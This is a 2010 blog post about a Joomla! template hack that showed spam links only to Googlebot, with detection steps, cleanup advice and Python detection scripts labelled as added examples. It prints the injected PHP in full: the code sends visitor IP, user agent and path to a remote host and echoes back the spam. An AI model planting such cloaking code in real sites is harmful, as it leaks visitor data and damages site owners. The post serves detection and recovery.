A hacking visible only to Google

September 14, 2010

Has your website been infected by link spam visible only to Google? If your site’s Google page rank has recently plummeted, do a Google search on the URL of your site and click on a few of the “Cached” links in the returned search results. See a bunch of spam links down at the bottom of one of the cached pages? If those links don’t appear in the current (non-cached) version of the page, then you’re probably the victim of a hacking that only targets the Google search bot.

Another way of spotting this is via the Fetch as Googlebot facility in Google Webmaster Tools:

  1. Log into Google Webmaster Tools;
  2. Select the relevant website from your list of verified sites;
  3. Open the Labs menu;
  4. Click on the “Fetch as Googlebot” link;
  5. Click the “Fetch” button;
  6. Click the “Success” link when it appears (you may need to refresh the page);
  7. Look for a bunch of spam links at the bottom of the resulting raw HTML.
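A quick way to automate the comparison the two checks above rely on is to request the same page twice, once with an ordinary browser User-Agent and once with Googlebot's, and report the links that only the bot-facing copy contains. The script below is an added example, not code from the original post: the User-Agent strings, the `check_url` helper and the two sample pages are my own constructions, and the sample run works offline on the embedded HTML.

```python
"""Added example (not from the original post): report links that a page serves
to Googlebot but not to an ordinary browser, i.e. cloaked link spam."""
from html.parser import HTMLParser
from urllib.parse import urljoin
from urllib.request import Request, urlopen

# Assumed User-Agent strings; Googlebot's is the documented one, the browser
# one is an arbitrary desktop browser.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/5.0"


class LinkCollector(HTMLParser):
    """Collect the href target of every <a> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def extract_links(html, base_url=""):
    """Return absolute link targets found in html (relative ones joined to base_url)."""
    parser = LinkCollector()
    parser.feed(html)
    return [urljoin(base_url, href) for href in parser.links]


def cloaked_links(browser_html, bot_html, base_url=""):
    """Links present in the bot-facing copy but absent from the browser-facing copy."""
    visible = set(extract_links(browser_html, base_url))
    return [link for link in extract_links(bot_html, base_url) if link not in visible]


def fetch(url, user_agent):
    """Fetch url with the given User-Agent and return the body as text."""
    req = Request(url, headers={"User-Agent": user_agent})
    with urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_url(url):
    """Fetch url as a browser and as Googlebot, return the bot-only links."""
    return cloaked_links(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA), url)


# Constructed sample pages: the second is the first with a spam block appended,
# mimicking what a cloaking script injects for the search bot only.
BROWSER_PAGE = """<html><body><p>Welcome</p><a href="/about">About</a>
<a href="/contact">Contact</a></body></html>"""
BOT_PAGE = BROWSER_PAGE + """<div><a href="http://spam.example/pills">cheap pills</a>
<a href="http://spam.example/loans">loans</a></div>"""

if __name__ == "__main__":
    for link in cloaked_links(BROWSER_PAGE, BOT_PAGE, "http://example.com/"):
        print("cloaked:", link)
```

Run `check_url("http://your-site.example/")` against a live site to do the real comparison. One caveat: a cloaking script that keys on the visitor's IP address or reverse DNS rather than the User-Agent header will serve you the clean page either way, which is why the Fetch as Googlebot check, made from Google's own infrastructure, is the more reliable of the two.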

Let’s be clear about why an intrusion like this is a big problem. Although the public can’t see those links, Google can, and that’s destroying your Google ranking. You need to remove the intrusion fast – and then you need to prevent it from reappearing.

The best way to remove the intrusion is, of course, to reinstall the site from a clean backup. But if you haven’t got a clean backup, you’re going to have to search through your site for infected files. Be on the lookout for code such as this:

<?php
  // This code use for global bot statistic
  $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
  $stCurlHandle = NULL;
  if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
  {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
    $stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
  } else
  {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
    $stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
  }
  curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  $sResult = curl_exec($stCurlHandle);
  curl_close($stCurlHandle);
  echo $sResult; // Statistic code end
?>

I found the above code lurking in one of my Joomla! 1.5.20 sites. It had been appended to the bottom of the index.php file of my current template (/templates/my_template_name/index.php). And at the top of the file, a single line had been inserted:

error_reporting(0);

That immediately rang alarm bells, as there shouldn’t be any PHP code above this line:

defined('_JEXEC') or die('Restricted access');

There were a few clever things going on there. The intruder didn’t attack the index.php file in the public_html directory – which is the usual target of attacks on Joomla! sites. He or she opted instead to modify the site template. Making the link spam visible only to Google meant that the attack stayed undetected for longer than would otherwise have been the case. And turning off error reporting in that script was a canny extra tweak.
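The indicators described above (a PHP statement ahead of the `_JEXEC` guard, `error_reporting(0)`, a User-Agent test for "google", and a `curl_init` call to a remote script) are easy to turn into a file scan. The following is an added example and not the post's own code; the indicator names, the regular expressions, the remote hostname placeholder and the two sample template files are my own constructions, and the patterns are heuristics that point at files worth reading rather than proof of compromise.

```python
"""Added example (not from the original post): scan a Joomla! tree for PHP
files carrying the indicators described in the post."""
import os
import re
import sys

# Indicators drawn from the injected code shown in the post.  Names and regexes
# are my own; they are heuristics, not signatures.
INDICATORS = [
    ("error_reporting(0)", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("user-agent check for 'google'",
     re.compile(r"strpos\s*\(\s*\$\w+\s*,\s*['\"]google['\"]", re.I)),
    ("outbound curl to a remote script",
     re.compile(r"curl_init\s*\(\s*['\"]https?://", re.I)),
]
JEXEC_GUARD = re.compile(r"defined\s*\(\s*['\"]_JEXEC['\"]\s*\)")


def code_before_guard(src):
    """True if any PHP statement precedes the _JEXEC guard (comments ignored)."""
    guard = JEXEC_GUARD.search(src)
    if not guard:
        return False
    head = src[:guard.start()]
    head = re.sub(r"/\*.*?\*/", "", head, flags=re.S)   # block comments
    head = re.sub(r"//[^\n]*|#[^\n]*", "", head)         # line comments
    head = head.replace("<?php", "")
    return head.strip() != ""


def scan_source(src):
    """Return the list of indicator names that fire on one file's contents."""
    hits = [name for name, pattern in INDICATORS if pattern.search(src)]
    if code_before_guard(src):
        hits.insert(0, "PHP code before the _JEXEC guard")
    return hits


def scan_tree(root):
    """Walk root and map each .php file with findings to its indicator list."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    results[path] = hits
    return results


# Constructed sample files: a clean template header and one modified the way
# the post describes (statement before the guard, cloaking block appended).
CLEAN_TEMPLATE = """<?php
/**
 * @package Joomla
 */
// no direct access
defined('_JEXEC') or die('Restricted access');
?>
<html><body><jdoc:include type="component" /></body></html>
"""
INFECTED_TEMPLATE = """<?php
error_reporting(0);
defined('_JEXEC') or die('Restricted access');
?>
<html><body><jdoc:include type="component" /></body></html>
<?php
  $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
  if(!(strpos($sUserAgent, 'google') === false))
  {
    $stCurlHandle = curl_init('http://REMOTE-HOST-PLACEHOLDER/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']));
  }
  curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  echo curl_exec($stCurlHandle);
?>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, "->", ", ".join(hits))
    else:
        print("clean sample:", scan_source(CLEAN_TEMPLATE))
        print("infected sample:", scan_source(INFECTED_TEMPLATE))
```

Point it at the site root (`python scan.py /path/to/public_html`) and read every flagged file by hand; a hit on the guard check alone is worth a look, since a legitimate Joomla! template should have nothing but comments ahead of `defined('_JEXEC')`. A scan like this helps you find what to inspect, but it does not replace reinstalling from a clean backup, which remains the only way to be sure nothing else was left behind.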

Having found the problem, I inspected my FTP logs and found that the server had been accessed from an IP address that wasn’t my own. The logs showed that the intruder had also modified the index.php files of my other templates (no surprise there) and had uploaded a file: /administrator/includes/pcl/gzip.lib.php.

Fortunately, I had a clean site backup to hand. I reinstalled the site, scanned my computer for FTP password-stealing malware, strengthened my FTP password (it might have been broken by a brute force attack), blocked the intruder’s IP address in cPanel, and tightened up a few other things on the site. And after a few days, the intrusion not having reoccurred, I contacted Google via Google Webmaster Tools to let them know that I had removed the intrusion.